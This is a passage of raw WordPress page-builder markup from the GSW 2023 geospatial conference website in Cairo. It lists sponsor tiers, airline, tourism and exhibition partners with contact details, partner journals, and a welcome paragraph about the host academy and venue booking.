css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 